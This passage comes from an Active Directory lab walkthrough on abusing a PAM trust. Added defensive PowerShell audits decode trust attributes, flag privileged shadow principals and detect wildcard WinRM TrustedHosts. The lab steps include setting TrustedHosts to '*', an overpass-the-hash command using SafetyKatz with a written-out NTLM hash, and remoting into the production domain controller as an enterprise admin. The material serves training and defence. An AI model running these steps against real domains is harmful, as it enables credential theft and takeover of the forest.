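The two TrustAttributes values seen above (8 on the bastion.local side, 1096 on the production.local side) tell the same story as the SIDFilteringForestAware flag, but only once decoded. As an added example (not part of the lab manual or the course tooling), the following PowerShell decodes the TrustAttributes bit field that Get-ADTrust returns so that a defender can recognise a PAM trust from its flags: 8 is FOREST_TRANSITIVE alone, while 1096 (0x448) is FOREST_TRANSITIVE + TREAT_AS_EXTERNAL + PIM_TRUST. Flag names and values follow the MS-ADTS trustAttributes definition; the two sample rows are constructed from the values in the output above, and the live Get-ADTrust call at the end is commented out.

```powershell
# Added example (not from the lab manual): decode the TrustAttributes bit field
# returned by Get-ADTrust and flag trusts that honour SID history across a
# forest boundary. Names and values follow MS-ADTS trustAttributes.
$TrustAttributeFlags = [ordered]@{
    0x001 = 'NON_TRANSITIVE'
    0x002 = 'UPLEVEL_ONLY'
    0x004 = 'QUARANTINED_DOMAIN'          # SID filtering (quarantine) enabled
    0x008 = 'FOREST_TRANSITIVE'
    0x010 = 'CROSS_ORGANIZATION'          # selective authentication
    0x020 = 'WITHIN_FOREST'
    0x040 = 'TREAT_AS_EXTERNAL'           # forest trust treated as external (SIDFilteringForestAware)
    0x080 = 'USES_RC4_ENCRYPTION'
    0x200 = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION'
    0x400 = 'PIM_TRUST'                   # PAM/PIM trust: SID history from the trusted forest is honoured
    0x800 = 'CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION'
}

# Return the names of every flag set in a TrustAttributes value.
function ConvertFrom-TrustAttributes {
    param([Parameter(Mandatory)][int]$Value)
    $TrustAttributeFlags.Keys |
        Where-Object { ($Value -band $_) -ne 0 } |
        ForEach-Object { $TrustAttributeFlags[$_] }
}

# Summarise one trust object (anything with Name, Direction and TrustAttributes,
# e.g. the output of Get-ADTrust) and attach a risk note where it matters.
function Get-TrustRiskFinding {
    param([Parameter(Mandatory)]$Trust)
    $flags = @(ConvertFrom-TrustAttributes -Value $Trust.TrustAttributes)
    $risk  = @()
    if ('PIM_TRUST' -in $flags)         { $risk += 'PAM trust: SID history from the trusted forest is honoured' }
    if ('TREAT_AS_EXTERNAL' -in $flags) { $risk += 'Forest trust treated as external; forest-aware SID filtering is off' }
    [pscustomobject]@{
        Name            = $Trust.Name
        Direction       = $Trust.Direction
        TrustAttributes = $Trust.TrustAttributes
        Flags           = $flags -join ','
        Risk            = $risk -join '; '
    }
}

# Constructed sample rows mirroring the two values in the lab output (8 and 1096).
$sample = @(
    [pscustomobject]@{ Name = 'production.local'; Direction = 'Inbound';  TrustAttributes = 8 }
    [pscustomobject]@{ Name = 'bastion.local';    Direction = 'Outbound'; TrustAttributes = 1096 }
)
$sample | ForEach-Object { Get-TrustRiskFinding -Trust $_ } | Format-Table -AutoSize

# Live audit (needs the ActiveDirectory module and rights to read the trust objects):
# Get-ADTrust -Filter * -Server production.local | ForEach-Object { Get-TrustRiskFinding -Trust $_ }
```

Note that the PIM_TRUST and TREAT_AS_EXTERNAL bits live on the production.local trust object only, which is why the bastion.local side shows a plain 8 and why the manual has to query with -Server production.local before the PAM trust becomes visible.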

Check the membership of Shadow Security Principals on bastion.local:

PS C:\Users\Administrator> Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

Name : Shadow Principal Configuration
member : {}
msDS-ShadowPrincipalSid :

Name : prodforest-ShadowEnterpriseAdmin
member : {CN=Administrator,CN=Users,DC=bastion,DC=local}
msDS-ShadowPrincipalSid : S-1-5-21-1765907967-2493560013-34545785-519

So, the Administrator of bastion.local is a member of a Shadow Security Principal that is mapped (RID 519) to
the Enterprise Admins group of production.local. That is, the Administrator of bastion.local has
Enterprise Admin privileges on production.local.
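The value of a PAM bastion forest rests on shadow principal memberships being temporary and reviewed; a standing member of a shadow principal that maps to Enterprise Admins, as seen above, is a permanent enterprise admin of the production forest. As an added example (not part of the lab manual or the course tooling), the following PowerShell enumerates every msDS-ShadowPrincipal under the Shadow Principal Configuration container, decodes the RID of the SID each one maps to, and reports those that grant a well-known privileged group and currently have members. It assumes the ActiveDirectory module and read access to the bastion forest's configuration partition; the -Server parameter name is mine.

```powershell
# Added example (not from the lab manual): audit shadow principals in a PAM
# bastion forest and flag privileged mappings that have standing members.
Import-Module ActiveDirectory

# Well-known RIDs of the groups a PAM trust is typically used to shadow.
$PrivilegedRids = @{
    512 = 'Domain Admins'
    516 = 'Domain Controllers'
    518 = 'Schema Admins'
    519 = 'Enterprise Admins'
}

function Get-ShadowPrincipalFinding {
    param([string]$Server)   # optional DC of the bastion forest (assumed parameter name)
    $params = @{}
    if ($Server) { $params['Server'] = $Server }

    $configNC = (Get-ADRootDSE @params).configurationNamingContext
    $base     = "CN=Shadow Principal Configuration,CN=Services,$configNC"

    Get-ADObject @params -SearchBase $base `
        -LDAPFilter '(objectClass=msDS-ShadowPrincipal)' `
        -Properties member, 'msDS-ShadowPrincipalSid' |
    ForEach-Object {
        $sid     = [string]$_.'msDS-ShadowPrincipalSid'
        $rid     = [int](($sid -split '-')[-1])
        $members = @($_.member)
        $isPriv  = $PrivilegedRids.ContainsKey($rid)
        [pscustomobject]@{
            Name        = $_.Name
            TargetSid   = $sid
            MappedGroup = if ($isPriv) { $PrivilegedRids[$rid] } else { "RID $rid" }
            MemberCount = $members.Count
            Members     = $members -join '; '
            Finding     = if ($isPriv -and $members.Count -gt 0) {
                              'Privileged shadow principal with standing members; confirm each one is time-bound and approved'
                          } else { '' }
        }
    }
}

# Run on (or against) a DC of the bastion forest; with the lab data this reports
# prodforest-ShadowEnterpriseAdmin mapped to Enterprise Admins with one member.
Get-ShadowPrincipalFinding | Format-List
```

Feed the output into whatever review process owns the bastion forest: every row with a Finding should correspond to an open, time-limited access request, and anything else is a standing privilege the PAM deployment was meant to remove.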

Now, we can access the production.local DC as domain administrator of bastion.local from our current
domain us.techcorp.local. Note that production.local has no DNS entry or trust with our current domain
us.techcorp.local, so we need to use the IP address of the production.local DC to access it.

Run the below command on the bastion-dc to get IP of production.local DC:

PS C:\Users\Administrator> Get-DnsServerZone -ZoneName production.local | fl *

MasterServers : 192.168.102.1
DistinguishedName :
DC=production.local,cn=MicrosoftDNS,DC=ForestDnsZones,DC=bastion,DC=local
[snip]

To use PowerShell Remoting to connect to an IP address, we must modify the WSMan Trustedhosts
property on the student VM. Run the below command in an elevated PowerShell on the student VM:

PS C:\Windows\system32> Set-Item WSMan:\localhost\Client\TrustedHosts * -Force
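Setting TrustedHosts to a wildcard is the weak setting here: it tells the WinRM client to send NTLM credentials to any host it is pointed at, so a poisoned name or a rogue listener can collect them. As an added example (not part of the lab manual or the course tooling), the following PowerShell audits the client-side TrustedHosts value and reports whether it contains a wildcard, with the corrected settings shown as commented remediation lines. It assumes the WSMan drive is available, which it is on any Windows host with WinRM installed.

```powershell
# Added example (not from the lab manual): audit the WinRM client TrustedHosts
# list. Expected hardened state: empty, or a short explicit list of hosts that
# genuinely require NTLM (IP addresses or non-domain machines).
function Test-WSManTrustedHosts {
    $raw     = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    $entries = @($raw -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
    $wild    = @($entries | Where-Object { $_ -match '\*' })

    [pscustomobject]@{
        TrustedHosts = $raw
        EntryCount   = $entries.Count
        HasWildcard  = $wild.Count -gt 0
        Finding      = if ($wild.Count -gt 0) {
                           'TrustedHosts contains a wildcard: any host can receive NTLM credentials; restrict or clear it'
                       } elseif ($entries.Count -gt 0) {
                           'Review each entry; prefer Kerberos (FQDN of a trusted domain) over NTLM to an IP'
                       } else { 'OK: TrustedHosts is empty' }
    }
}

Test-WSManTrustedHosts

# Remediation (elevated). Either clear the list or replace '*' with the exact hosts needed:
# Set-Item WSMan:\localhost\Client\TrustedHosts -Value '' -Force
# Set-Item WSMan:\localhost\Client\TrustedHosts -Value 'bastion-dc.bastion.local' -Force
```

The same value is exposed to configuration management and EDR as the TrustedHosts setting under WSMan:\localhost\Client, so a fleet-wide check for '*' is a cheap detection of the step this lab performs.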

Additionally, to connect to an IP address we have to use NTLM authentication. Therefore, we need to
run OverPass-The-Hash with the NTLM hash, not the AES keys, of the domain administrator of bastion.local:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:administrator /domain:bastion.local
/ntlm:f29207796c9e6829aa1882b7cccfa36d /run:powershell.exe" "exit"
[snip]

In the new PowerShell session:

PS C:\Windows\system32> Enter-PSSession 192.168.102.1 -Authentication NegotiateWithImplicitCredential
[192.168.102.1]: PS C:\Users\Administrator.BASTION\Documents> whoami
bastion\administrator
[192.168.102.1]: PS C:\Users\Administrator.BASTION\Documents> hostname
Production-DC
[192.168.102.1]: PS C:\Users\Administrator.BASTION\Documents>
